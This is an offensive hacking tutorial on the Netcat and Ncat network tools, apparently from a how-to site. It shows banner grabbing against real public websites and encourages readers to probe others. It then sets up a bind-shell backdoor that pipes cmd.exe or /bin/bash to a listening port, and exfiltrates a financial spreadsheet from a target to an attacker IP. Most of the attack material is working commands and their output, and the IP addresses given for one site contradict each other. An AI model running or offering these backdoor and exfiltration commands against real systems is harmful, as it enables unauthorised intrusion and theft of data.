For over 20 years, a tiny but mighty tool has been used by hackers for a wide range of activities. Although well known in hacking circles, Netcat is virtually unknown outside. It's so simple, powerful, and useful that many people within the IT community refer to it as the "Swiss Army knife of hacking tools." We'll look at the capabilities of Netcat and how the aspiring hacker can use it.
Netcat, like so many hacker tools, was created to be a network analysis tool. Developed in 1995 by a fellow only known as "Hobbit," Netcat was given to the IT community without compensation but has received scores of accolades.
However, while still useful, it has not been maintained, so Nmap produced a modern version of it with more up-to-date features. The new version is called Ncat and, for the most part, has the same commands as Netcat so that they can be used interchangeably.
You can use either Netcat or Ncat to open up TCP and UDP connections between two machines over any port your heart desires. Also, these tools can be used for port scanning, similar to Nmap. Netcat and Ncat can be used for port forwarding, proxying, simple web server, and leaving an open backdoor for the hacker, as well.
Let's look at some of Netcat's capabilities using Kali Linux. Netcat should be installed, but Ncat might not be. To install either, just use one of the commands below.
apt-get install netcat apt-get install ncat
Once we've fired up our Kali Linux system and opened a terminal, we can use Netcat from any directory since it's located in our bin directory which is in our PATH variable by default. So, let's type nc -h to see its help page.
nc -h [v1.10-41.1] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -C Send CRLF as line-ending -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
And this is for Ncat:
ncat -h Ncat 7.70 ( https://nmap.org/ncat ) Usage: ncat [options] [hostname] [port] Options taking a time assume seconds. Append 'ms' for milliseconds, 's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms). -4 Use IPv4 only -6 Use IPv6 only -U, --unixsock Use Unix domain sockets only -C, --crlf Use CRLF for EOL sequence -c, --sh-exec <command> Executes the given command via /bin/sh -e, --exec <command> Executes the given command --lua-exec <filename> Executes the given Lua script -g hop1[,hop2,...] Loose source routing hop points (8 max) -G <n> Loose source routing hop pointer (4, 8, 12, ...) -m, --max-conns <n> Maximum <n> simultaneous connections -h, --help Display this help screen -d, --delay <time> Wait between read/writes -o, --output <filename> Dump session data to a file -x, --hex-dump <filename> Dump session data as hex to a file -i, --idle-timeout <time> Idle read/write timeout -p, --source-port port Specify source port to use -s, --source addr Specify source address to use (doesn't affect -l) -l, --listen Bind and listen for incoming connections -k, --keep-open Accept multiple connections in listen mode -n, --nodns Do not resolve hostnames via DNS -t, --telnet Answer Telnet negotiations -u, --udp Use UDP instead of default TCP --sctp Use SCTP instead of default TCP -v, --verbose Set verbosity level (can be used several times) -w, --wait <time> Connect timeout -z Zero-I/O mode, report connection status only --append-output Append rather than clobber specified output files --send-only Only send data, ignoring received; quit on EOF --recv-only Only receive data, never send anything --allow Allow only given hosts to connect to Ncat --allowfile A file of hosts allowed to connect to Ncat --deny Deny given hosts from connecting to Ncat --denyfile A file of hosts denied from connecting to Ncat --broker Enable Ncat's connection brokering mode --chat Start a simple Ncat chat server --proxy <addr[:port]> Specify address of host to proxy through --proxy-type <type> Specify proxy type ("http" or "socks4" or "socks5") --proxy-auth <auth> Authenticate with HTTP or SOCKS proxy server --ssl Connect or listen with SSL --ssl-cert Specify SSL certificate file (PEM) for listening --ssl-key Specify SSL private key (PEM) for listening --ssl-verify Verify trust and domain name of certificates --ssl-trustfile PEM file containing trusted SSL certificates --ssl-ciphers Cipherlist containing SSL ciphers to use --ssl-alpn ALPN protocol list to use. --version Display Ncat's version information and exit See the ncat(1) manpage for full options, descriptions and usage examples
As you can see from the help screen above, the basic syntax for Netcat is the following. (Substitute nc for ncat if using Ncat instead of Netcat. We will just be using nc for the rest of this guide.)
To connect to another machine:
nc options host-IP-address port
To listen for inbound connections:
nc -l -p port
Let's go ahead and use Netcat to connect to a remote system. In this case, we will try to connect to a web server on port 80.
nc 192.168.1.105 80
That command gives us a TCP connection, by default, to the web server (port 80) at 192.168.1.105. Now, whatever we type, we will be sent directly to the web server when we hit enter.
Before attacking any system, we need to know as much as possible about the target. So, once we have a TCP connection to a web server, we can use Netcat to grab the banner of the web server that's served up to new connections to identify what web-serving software the target is running.
A banner grab to the web server can be done with the HEAD / HTTP/1.0 command. Be careful and copy exactly as is with the slashes and spaces. Alternatively, if this doesn't work, you can try HEAD / HTTP/1.1 instead.
HEAD / HTTP/1.0
Hit enter a few times and the web server will respond with its banner telling us exactly what software it is running. In this case, we can see that the web server is running Microsoft's IIS 7.5.
HTTP/1.1 200 OK Content-Length: 998 Content-Type: text/html Content-Location: http://192.168.1.105/index.html Last-Modified: Wed, 26 Sep 2018 17:59:41 GMT Accept-Ranges: bytes Etag: "e245c46986ecc61:93f" Server: Microsoft-IIS/7.5 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Date: Sat, 08 Dec 2018 02:14:35 GMT Conection: close
We can use this technique on other public websites, as well. Let's try it on some widely known sites and see what web server software they're running.
First, let's try this website, wonderhowto.com. When we ping wonderhowto.com, we see that its IP address is 220.127.116.11. So, we throw that into the command, then, after getting a connection, we grab the web server banner. Remember to hit enter two or three times. As we can see, wonderhowto.com is running its own WonderHowTo server.
nc 18.104.22.168 80 HEAD / HTTP/1.0 HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 141 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://wonderhowto.com/ Server: WonderHowTo X-UA-Compatible: IE=Edge,chrome=1 X-Server-Name: APP01 X-Content-Type-Options: nosniff Date: Sat, 08 Dec 2018 02:19:08 GMT Connection: keep-alive
But that doesn't seem right. Let's try again with HEAD / HTTP/1.1 instead. As seen below, we get a bad request but do see that Microsoft-HTTPAPI/2.0 shows up, which is a common reading when the actual server is a Microsoft-IIS version.
nc 22.214.171.124 80 HEAD / HTTP/1.1 HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 08 Dec 2018 03:04:29 GMT Connection: close
If we try the same thing with ebay.com, we get the results below. As you can see, it runs on an Apache-Coyote.1.1 server.
nc 126.96.36.199 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: 49c752f2ba437586596f602605cb5820 Last-Modified: Fri, 8 Dec 2018 01:48:47 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 857 Date: Sat, 08 Dec 2018 02:38:44 GMT Connection: keep-alive
Go ahead and try it on other websites and find out what server they're running. However, note that it may not work for all sites or you may not see the server information.
Now, let's use Netcat to create a listener on the remote system. Let's assume that we have a Windows server that we have installed Netcat on. We can now type the following to open a Netcat listener on port 6996 (it can be any port) on that system.
nc - l -p 6996
This has created a "listener" that we can connect to at our leisure.
C:\> C:\> C:\> C:\> C:\> C:\>nc -l -p 6996
Note that on Windows systems, we can run this same command with an upper case L to create a persistent listener that will open up even if the system is rebooted.
Now, let's create a backdoor on the target system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.
For Windows, we use:
nc -l -p 6996 -e cmd.exe
For Linux, it's:
nc -l -p 6996 -e /bin/bash
This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system.
Next, on our attacking system, we type the following one-liner. As you can see, the Windows command prompt has been piped through our Netcat connection directly to our attacking system. We own that box!
nc 192.168.1.105 6996 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\>
Netcat can also be used to exfiltrate files and data from the target. Let's imagine that there's data on the target system that we want, maybe financial data or data stored in a database. We can use a stealth connection to slowly copy that data out to our attack system. In this example, we will exfiltrate a file called financialprojections.xls, presumably an Excel file with financial projections.
From the source system, we type:
type financialprojections.xls | nc 192.168.1.104 6996
That command says to display the file financialprojections.xls, then pipe (|) it to Netcat (nc) to IP address 192.168.1.104 through port 6996.
02/26/2013 05:28 PM <DIR> WINDOWS 10/09/2006 03:55 PM <DIR> wmpub 4 Files(s) 59,533 bytes 8 Dir(s) 4,876,210,176 bytes free C:\>type financialprojections.xls | nc 192.168.1.104 6996 C:\>type financialprojections.xls | nc 192.168.1.104 6996
From the destination system, we type:
nc -l -p 6996 > financialprojections.xls
That command says to create a listener (l) on port (p) 6996, then send the data received on this listener to a file named financialprojections.xls. We can see in the code below, after using ls -l, that the file was copied across our Netcat connection over port 6996 to our attacking machine!
ls -l total 356 drwxr-xr-x 2 root root 4096 2011-05-07 11:46 Desktop -rw-r--r-- 1 root root 141 2013-09-18 12:25 financialprojections.xls -rw-r--r-- 1 root root 192 2013-09-02 13:49 replay_arp-0902-133213.cap -rw-r--r-- 1 root root 0 2013-09-02 16:08 snortlog -rw-r--r-- 1 root root 338111 2013-09-02 13:49 WEPcrack-01.cap -rw-r--r-- 1 root root 575 2013-09-02 13:49 WEPcrack-01.csv -rw-r--r-- 1 root root 582 2013-09-02 13:49 WEPcrack-01.kismet.csv -rw-r--r-- 1 root root 3660 2013-09-02 13:49 WEPcrack-01.kismet.netxml
This is just a small sample of what this powerful little program can do. When you combine it with some basic scripting skills, you can only imagine the incredible things that can be accomplished.